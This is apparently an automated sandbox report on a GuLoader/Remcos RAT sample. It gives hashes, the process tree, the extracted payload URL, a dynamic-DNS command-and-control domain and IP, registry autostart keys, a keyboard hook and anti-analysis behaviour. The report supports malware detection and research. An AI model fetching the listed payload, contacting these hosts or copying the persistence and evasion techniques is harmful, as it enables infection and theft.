Play interactive tour

Edit tour

Windows Analysis Report Fec9qUX4at.exe

Overview

General Information

Sample Name:	Fec9qUX4at.exe
Analysis ID:	458355
MD5:	2046b941817392e3815535fccb1f39dc
SHA1:	843d243a71131baf9fbe0fcf4ba129f51ee74c8f
SHA256:	c0d3da1cefd1a979c8b8ce102fd5d3ff090779f72f4d1098eb383cbbb3480bee
Tags:	exe
Infos:
Most interesting Screenshot:

Detection

GuLoader Remcos

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

GuLoader behavior detected

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Yara detected Remcos RAT

C2 URLs / IPs found in malware configuration

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Creates autostart registry keys with suspicious values (likely registry only malware)

Deletes itself after installation

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Hides threads from debuggers

Installs a global keyboard hook

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: WScript or CScript Dropper

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Uses dynamic DNS services

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Found WSH timer for Javascript or VBS script (likely evasive script)

Internet Provider seen in connection with other malware

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains strange resources

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

Fec9qUX4at.exe (PID: 1304 cmdline: 'C:\Users\user\Desktop\Fec9qUX4at.exe' MD5: 2046B941817392E3815535FCCB1F39DC)

Fec9qUX4at.exe (PID: 1152 cmdline: 'C:\Users\user\Desktop\Fec9qUX4at.exe' MD5: 2046B941817392E3815535FCCB1F39DC)

wscript.exe (PID: 808 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\wqhhwuvojbjzckdf.vbs' MD5: 7075DD7B9BE8807FCA93ACD86F724884)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "http://101.99.94.119/WEALTH_fkWglQyCXO188.bin"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: Fec9qUX4at.exe PID: 1152	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security

Sigma Overview

System Summary:

Sigma detected: Suspicious Script Execution From Temp Folder

Show sources

Source: Process started

Author: Florian Roth, Max Altgelt: Data: Command: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\wqhhwuvojbjzckdf.vbs' , CommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\wqhhwuvojbjzckdf.vbs' , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: 'C:\Users\user\Desktop\Fec9qUX4at.exe' , ParentImage: C:\Users\user\Desktop\Fec9qUX4at.exe, ParentProcessId: 1152, ProcessCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\wqhhwuvojbjzckdf.vbs' , ProcessId: 808

Sigma detected: WScript or CScript Dropper

Show sources

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (rule), oscd.community: Data: Command: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\wqhhwuvojbjzckdf.vbs' , CommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\wqhhwuvojbjzckdf.vbs' , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: 'C:\Users\user\Desktop\Fec9qUX4at.exe' , ParentImage: C:\Users\user\Desktop\Fec9qUX4at.exe, ParentProcessId: 1152, ProcessCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\wqhhwuvojbjzckdf.vbs' , ProcessId: 808

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "http://101.99.94.119/WEALTH_fkWglQyCXO188.bin"}

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\DYKKERDRAGTS\FANEBREREN.exe	Virustotal: Detection: 28%			Perma Link
Source: C:\Users\user\AppData\Local\Temp\DYKKERDRAGTS\FANEBREREN.exe	ReversingLabs: Detection: 13%

Multi AV Scanner detection for submitted file

Show sources

Source: Fec9qUX4at.exe	Virustotal: Detection: 28%			Perma Link
Source: Fec9qUX4at.exe	ReversingLabs: Detection: 13%

Yara detected Remcos RAT

Show sources

Source: Yara match

File source: Process Memory Space: Fec9qUX4at.exe PID: 1152, type: MEMORYSTR

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\DYKKERDRAGTS\FANEBREREN.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: Fec9qUX4at.exe

Joe Sandbox ML: detected

Source: Fec9qUX4at.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: http://101.99.94.119/WEALTH_fkWglQyCXO188.bin

Uses dynamic DNS services

Show sources

Source: unknown

DNS query: name: wealthyrem.ddns.net

Source: global traffic

TCP traffic: 192.168.2.3:49733 -> 194.5.97.128:39200

Source: Joe Sandbox View

ASN Name: DANILENKODE DANILENKODE

Source: global traffic

HTTP traffic detected: GET /WEALTH_fkWglQyCXO188.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 101.99.94.119Cache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119

Source: global traffic

HTTP traffic detected: GET /WEALTH_fkWglQyCXO188.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 101.99.94.119Cache-Control: no-cache

Source: unknown

DNS traffic detected: queries for: wealthyrem.ddns.net

Source: Fec9qUX4at.exe, 00000011.00000002.487607520.00000000009A7000.00000004.00000020.sdmp

String found in binary or memory: http://101.99.94.119/WEALTH_fkWglQyCXO188.bin

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook

Show sources

Source: C:\Users\user\Desktop\Fec9qUX4at.exe

Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\Fec9qUX4at.exe

Jump to behavior

Source: Fec9qUX4at.exe, 00000000.00000002.338277052.000000000063A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Remcos RAT

Show sources

Source: Yara match

File source: Process Memory Space: Fec9qUX4at.exe PID: 1152, type: MEMORYSTR

System Summary:

Source: C:\Users\user\Desktop\Fec9qUX4at.exe

Process Stats: CPU usage > 98%

Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F5586A NtAllocateVirtualMemory,	0_2_04F5586A
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F505E0 EnumWindows,NtWriteVirtualMemory,	0_2_04F505E0
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F509C7 NtWriteVirtualMemory,	0_2_04F509C7
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F58F67 NtProtectVirtualMemory,	0_2_04F58F67
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F542D5 NtWriteVirtualMemory,	0_2_04F542D5
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F558D5 NtAllocateVirtualMemory,	0_2_04F558D5
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F54693 NtWriteVirtualMemory,	0_2_04F54693
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F54A46 NtWriteVirtualMemory,	0_2_04F54A46
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F54A2D NtWriteVirtualMemory,	0_2_04F54A2D
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F54C15 NtWriteVirtualMemory,	0_2_04F54C15
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F58FBB NtProtectVirtualMemory,	0_2_04F58FBB
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F5475A NtWriteVirtualMemory,	0_2_04F5475A

Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_00401144	0_2_00401144
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F584C9	0_2_04F584C9
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F5209D	0_2_04F5209D
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F50C76	0_2_04F50C76
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F55661	0_2_04F55661
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F5586A	0_2_04F5586A
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F505E0	0_2_04F505E0
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F509C7	0_2_04F509C7
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F59577	0_2_04F59577
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F52559	0_2_04F52559
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F542D5	0_2_04F542D5
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F514D1	0_2_04F514D1
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F514D9	0_2_04F514D9
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F506D9	0_2_04F506D9
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F50CC2	0_2_04F50CC2
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F510C2	0_2_04F510C2
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F520C2	0_2_04F520C2
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F538B9	0_2_04F538B9
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F57AA5	0_2_04F57AA5
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F57EAD	0_2_04F57EAD
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F52AAE	0_2_04F52AAE
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F54693	0_2_04F54693
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F54292	0_2_04F54292
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F58C9D	0_2_04F58C9D
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F53051	0_2_04F53051
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F55C5C	0_2_04F55C5C
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F54A46	0_2_04F54A46
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F5864F	0_2_04F5864F
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F53424	0_2_04F53424
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F54A2D	0_2_04F54A2D
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F54C15	0_2_04F54C15
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F55E11	0_2_04F55E11
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F5380C	0_2_04F5380C
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F585F7	0_2_04F585F7
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F50BE6	0_2_04F50BE6
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F53FDB	0_2_04F53FDB
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F577CC	0_2_04F577CC
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F53996	0_2_04F53996
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F51D86	0_2_04F51D86
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F58181	0_2_04F58181
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F51D8F	0_2_04F51D8F
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F52D7C	0_2_04F52D7C
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F57F61	0_2_04F57F61
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F58355	0_2_04F58355
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F58759	0_2_04F58759
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F5475A	0_2_04F5475A
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F5215A	0_2_04F5215A
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F5293E	0_2_04F5293E
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F52138	0_2_04F52138

Source: Fec9qUX4at.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Fec9qUX4at.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: FANEBREREN.exe.17.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: FANEBREREN.exe.17.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: Fec9qUX4at.exe, 00000000.00000002.338068961.0000000000417000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameCLUBWOMAN.exe vs Fec9qUX4at.exe
Source: Fec9qUX4at.exe, 00000000.00000002.338242291.00000000005F0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs Fec9qUX4at.exe
Source: Fec9qUX4at.exe, 00000011.00000002.491236633.000000001E770000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs Fec9qUX4at.exe
Source: Fec9qUX4at.exe, 00000011.00000002.491236633.000000001E770000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs Fec9qUX4at.exe
Source: Fec9qUX4at.exe, 00000011.00000000.336595549.0000000000417000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameCLUBWOMAN.exe vs Fec9qUX4at.exe
Source: Fec9qUX4at.exe, 00000011.00000002.490989304.000000001DD60000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemswsock.dll.muij% vs Fec9qUX4at.exe
Source: Fec9qUX4at.exe, 00000011.00000002.487682581.0000000000A0E000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenamewscript.exe.mui` vs Fec9qUX4at.exe
Source: Fec9qUX4at.exe, 00000011.00000002.487682581.0000000000A0E000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenamewscript.exe` vs Fec9qUX4at.exe
Source: Fec9qUX4at.exe, 00000011.00000002.491075491.000000001E670000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs Fec9qUX4at.exe
Source: Fec9qUX4at.exe	Binary or memory string: OriginalFilenameCLUBWOMAN.exe vs Fec9qUX4at.exe

Source: Fec9qUX4at.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/4@1/2

Source: C:\Users\user\Desktop\Fec9qUX4at.exe

File created: C:\Users\user\AppData\Roaming\remcos

Jump to behavior

Source: C:\Users\user\Desktop\Fec9qUX4at.exe

Mutant created: \Sessions\1\BaseNamedObjects\Remcos-FAZALZ

Source: C:\Users\user\Desktop\Fec9qUX4at.exe

File created: C:\Users\user\AppData\Local\Temp\~DFDAA17C5C5846B2AF.TMP

Jump to behavior

Source: C:\Users\user\Desktop\Fec9qUX4at.exe

Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\wqhhwuvojbjzckdf.vbs'

Source: Fec9qUX4at.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Fec9qUX4at.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Users\user\Desktop\Fec9qUX4at.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Fec9qUX4at.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\Fec9qUX4at.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Fec9qUX4at.exe	Virustotal: Detection: 28%
Source: Fec9qUX4at.exe	ReversingLabs: Detection: 13%

Source: C:\Users\user\Desktop\Fec9qUX4at.exe

File read: C:\Users\user\Desktop\Fec9qUX4at.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Fec9qUX4at.exe 'C:\Users\user\Desktop\Fec9qUX4at.exe'
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process created: C:\Users\user\Desktop\Fec9qUX4at.exe 'C:\Users\user\Desktop\Fec9qUX4at.exe'
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\wqhhwuvojbjzckdf.vbs'
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process created: C:\Users\user\Desktop\Fec9qUX4at.exe 'C:\Users\user\Desktop\Fec9qUX4at.exe'	Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\wqhhwuvojbjzckdf.vbs'	Jump to behavior

Source: C:\Users\user\Desktop\Fec9qUX4at.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match

File source: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Fec9qUX4at.exe

Code function: 0_2_00407CF7 push eax; ret

0_2_00407CF8

Source: initial sample	Static PE information: section name: .text entropy: 7.05513425915
Source: initial sample	Static PE information: section name: .text entropy: 7.05513425915

Source: C:\Users\user\Desktop\Fec9qUX4at.exe

File created: C:\Users\user\AppData\Local\Temp\DYKKERDRAGTS\FANEBREREN.exe

Jump to dropped file

Boot Survival:

Creates autostart registry keys with suspicious values (likely registry only malware)

Show sources

Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce AMPHITHYRONS C:\Users\user\AppData\Local\Temp\DYKKERDRAGTS\FANEBREREN.vbs			Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce AMPHITHYRONS C:\Users\user\AppData\Local\Temp\DYKKERDRAGTS\FANEBREREN.vbs			Jump to behavior

Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce AMPHITHYRONS	Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce AMPHITHYRONS	Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce AMPHITHYRONS	Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce AMPHITHYRONS	Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Deletes itself after installation

Show sources

Source: C:\Windows\SysWOW64\wscript.exe

File deleted: c:\users\user\desktop\fec9qux4at.exe

Jump to behavior

Source: C:\Users\user\Desktop\Fec9qUX4at.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Show sources

Source: C:\Users\user\Desktop\Fec9qUX4at.exe

Code function: 0_2_04F50C76 TerminateProcess,

0_2_04F50C76

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Show sources

